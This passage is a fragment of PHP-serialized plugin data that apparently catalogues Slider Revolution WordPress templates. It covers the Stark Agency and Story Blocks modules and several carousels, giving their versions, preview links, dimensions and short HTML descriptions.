Header\";s:5:\"alias\";s:12:\"stark-header\";s:3:\"zip\";s:22:\"packs/stark-header.zip\";s:3:\"uid\";s:32:\"62bfca01bf6e33cfad81d8df06498299\";s:3:\"img\";s:23:\"stark-header/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:93:\"offset=\"t:40px,30px,20px,10px;b:0px,0px,0px,0px;l:40px,30px,20px,10px;r:40px,30px,20px,10px;\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:439;a:25:{s:2:\"id\";s:3:\"475\";s:5:\"title\";s:13:\"Stark Content\";s:5:\"alias\";s:13:\"stark-content\";s:3:\"zip\";s:23:\"packs/stark-content.zip\";s:3:\"uid\";s:32:\"4577ca760133eb5d894c46f212f6eefb\";s:3:\"img\";s:24:\"stark-content/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:110:\"offset=\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:140px,70px,50px,30px;r:140px,70px,50px,30px;\" zindex=\"6\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:440;a:25:{s:2:\"id\";s:3:\"476\";s:5:\"title\";s:14:\"Stark Carousel\";s:5:\"alias\";s:14:\"stark-carousel\";s:3:\"zip\";s:24:\"packs/stark-carousel.zip\";s:3:\"uid\";s:32:\"de63336d333eeff10eccfd5d9741e6c9\";s:3:\"img\";s:25:\"stark-carousel/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:108:\"offset=\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:40px,30px,20px,10px;r:40px,30px,20px,10px;\" zindex=\"1\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:441;a:25:{s:2:\"id\";s:3:\"477\";s:5:\"title\";s:15:\"Stark Portfolio\";s:5:\"alias\";s:15:\"stark-portfolio\";s:3:\"zip\";s:25:\"packs/stark-portfolio.zip\";s:3:\"uid\";s:32:\"99fcf3df65f8471fe30bec1bf0c2350d\";s:3:\"img\";s:26:\"stark-portfolio/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:110:\"offset=\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:140px,70px,50px,30px;r:140px,70px,50px,30px;\" zindex=\"5\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:442;a:25:{s:2:\"id\";s:3:\"478\";s:5:\"title\";s:22:\"Stark Portfolio Detail\";s:5:\"alias\";s:22:\"stark-portfolio-detail\";s:3:\"zip\";s:32:\"packs/stark-portfolio-detail.zip\";s:3:\"uid\";s:32:\"7484fc54f81daec07c93e992216310ce\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:443;a:25:{s:2:\"id\";s:3:\"479\";s:5:\"title\";s:13:\"Stark Contact\";s:5:\"alias\";s:13:\"stark-contact\";s:3:\"zip\";s:23:\"packs/stark-contact.zip\";s:3:\"uid\";s:32:\"8d704226b7093123a9d9faf424da6c35\";s:3:\"img\";s:24:\"stark-contact/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:108:\"offset=\"t:-50px,-30px,-30px,-20px;b:0px,0px,0px,0px;l:40px,30px,20px,10px;r:40px,30px,20px,10px;\" zindex=\"2\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:444;a:25:{s:2:\"id\";s:3:\"480\";s:5:\"title\";s:12:\"Stark Footer\";s:5:\"alias\";s:12:\"stark-footer\";s:3:\"zip\";s:22:\"packs/stark-footer.zip\";s:3:\"uid\";s:32:\"e7132dc158e7dcdb4ef5b3a1aa00208a\";s:3:\"img\";s:23:\"stark-footer/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:114:\"offset=\"t:-50px,-30px,-30px,-20px;b:40px,30px,20px,20px;l:140px,70px,50px,30px;r:140px,70px,50px,30px;\" zindex=\"3\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:445;a:25:{s:2:\"id\";s:3:\"481\";s:5:\"title\";s:16:\"Stark Newsletter\";s:5:\"alias\";s:16:\"stark-newsletter\";s:3:\"zip\";s:26:\"packs/stark-newsletter.zip\";s:3:\"uid\";s:32:\"bb76ddd68dbe6bda5ece7e4227a51413\";s:3:\"img\";s:27:\"stark-newsletter/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/stark-agency-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:221:\"<span class=\"ttm_content\">The Stark Agency website template is a collection of modules using our new Gutenberg Block \"margin & padding\" feature. Create unique, customizable layouts!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:22:\"Stark Website Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:33:\"usage=\"modal\" modal=\"s:#contact;\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"37\";s:9:\"installed\";b:0;}i:446;a:22:{s:2:\"id\";s:3:\"482\";s:5:\"title\";s:15:\"Big Summer Sale\";s:5:\"alias\";s:15:\"big-summer-sale\";s:3:\"zip\";s:19:\"big-summer-sale.zip\";s:3:\"uid\";s:32:\"a6779fa7109763209d234f9cf2e766c6\";s:3:\"img\";s:26:\"big-summer-sale/slide1.jpg\";s:7:\"preview\";s:62:\"https://revolution.themepunch.com/big-summer-sale-shop-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:153:\"<span class=\"ttm_content\">The Big Summer Sale Shop Slider is a beautiful eye catcher for your e-commerce website!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:447;a:22:{s:2:\"id\";s:3:\"483\";s:5:\"title\";s:18:\"Traveller Carousel\";s:5:\"alias\";s:18:\"traveller-carousel\";s:3:\"zip\";s:22:\"traveller-carousel.zip\";s:3:\"uid\";s:32:\"185344ed6236bea2906a79035d1d5702\";s:3:\"img\";s:29:\"traveller-carousel/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/travel-blog-carousel/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:137:\"<span class=\"ttm_content\">A travel blog carousel with interesting parallax and ken burns effects!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:263:\"<span class=\"ttm_content\">Note that the content visible on all slides can be edited on the \"global layers\" slide.<br/>Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:448;a:22:{s:2:\"id\";s:3:\"484\";s:5:\"title\";s:16:\"Project Carousel\";s:5:\"alias\";s:16:\"project-carousel\";s:3:\"zip\";s:20:\"project-carousel.zip\";s:3:\"uid\";s:32:\"49c85ad406da943bdd25f08fd6496748\";s:3:\"img\";s:27:\"project-carousel/slide1.jpg\";s:7:\"preview\";s:51:\"https://revolution.themepunch.com/project-carousel/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:137:\"<span class=\"ttm_content\">A project carousel with images and texts that can be customized easily!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:449;a:22:{s:2:\"id\";s:3:\"485\";s:5:\"title\";s:13:\"News Carousel\";s:5:\"alias\";s:13:\"news-carousel\";s:3:\"zip\";s:17:\"news-carousel.zip\";s:3:\"uid\";s:32:\"76f5b939150092a30038f161084140ae\";s:3:\"img\";s:24:\"news-carousel/slide1.jpg\";s:7:\"preview\";s:48:\"https://revolution.themepunch.com/news-carousel/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:134:\"<span class=\"ttm_content\">A news carousel with images and texts that can be customized easily!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:450;a:25:{s:2:\"id\";s:3:\"486\";s:5:\"title\";s:29:\"Story Blocks Website Template\";s:5:\"alias\";s:29:\"story-blocks-website-template\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:37:\"story-blocks-website-template-package\";s:3:\"img\";s:50:\"packages/story-blocks-website-template-package.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:451;a:25:{s:2:\"id\";s:3:\"487\";s:5:\"title\";s:10:\"Story Menu\";s:5:\"alias\";s:10:\"story-menu\";s:3:\"zip\";s:20:\"packs/story-menu.zip\";s:3:\"uid\";s:32:\"1f2f7cd91480f15cff8e7100f788c650\";s:3:\"img\";s:21:\"story-menu/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:452;a:25:{s:2:\"id\";s:3:\"488\";s:5:\"title\";s:12:\"Story Header\";s:5:\"alias\";s:12:\"story-header\";s:3:\"zip\";s:22:\"packs/story-header.zip\";s:3:\"uid\";s:32:\"e1a5ad5018a24ccdc71c2863edfe775e\";s:3:\"img\";s:23:\"story-header/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:453;a:25:{s:2:\"id\";s:3:\"489\";s:5:\"title\";s:13:\"Story Block 1\";s:5:\"alias\";s:13:\"story-block-1\";s:3:\"zip\";s:23:\"packs/story-block-1.zip\";s:3:\"uid\";s:32:\"2a9fee97dcf477e36d048af8a902f47a\";s:3:\"img\";s:24:\"story-block-1/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:454;a:25:{s:2:\"id\";s:3:\"490\";s:5:\"title\";s:15:\"Story Content 1\";s:5:\"alias\";s:15:\"story-content-1\";s:3:\"zip\";s:25:\"packs/story-content-1.zip\";s:3:\"uid\";s:32:\"6773614bbce543b83a0d2b2ad8facc96\";s:3:\"img\";s:26:\"story-content-1/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:455;a:25:{s:2:\"id\";s:3:\"491\";s:5:\"title\";s:13:\"Story Block 2\";s:5:\"alias\";s:13:\"story-block-2\";s:3:\"zip\";s:23:\"packs/story-block-2.zip\";s:3:\"uid\";s:32:\"2e708e3cebab57ca20b228ffba426ce7\";s:3:\"img\";s:24:\"story-block-2/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:456;a:25:{s:2:\"id\";s:3:\"492\";s:5:\"title\";s:13:\"Story Block 3\";s:5:\"alias\";s:13:\"story-block-3\";s:3:\"zip\";s:23:\"packs/story-block-3.zip\";s:3:\"uid\";s:32:\"7156cf069f65644faf90122dab451231\";s:3:\"img\";s:24:\"story-block-3/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Story Blocks Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"38\";s:9:\"installed\";b:0;}i:457;a:25:{s:2:\"id\";s:3:\"493\";s:5:\"title\";s:15:\"Story Content 2\";s:5:\"alias\";s:15:\"story-content-2\";s:3:\"zip\";s:25:\"packs/story-content-2.zip\";s:3:\"uid\";s:32:\"1223cd77d1f36d69e69ce50223e16ea7\";s:3:\"img\";s:26:\"story-content-2/slide1.jpg\";s:7:\"preview\";s:47:\"https://revolution.themepunch.com/story-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:229:\"<span class=\"ttm_content\">The Story Blocks for Slider Revolution can be used to create scroll-based stories on your WordPress site. Mix and match the individual blocks to create YOUR story!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution 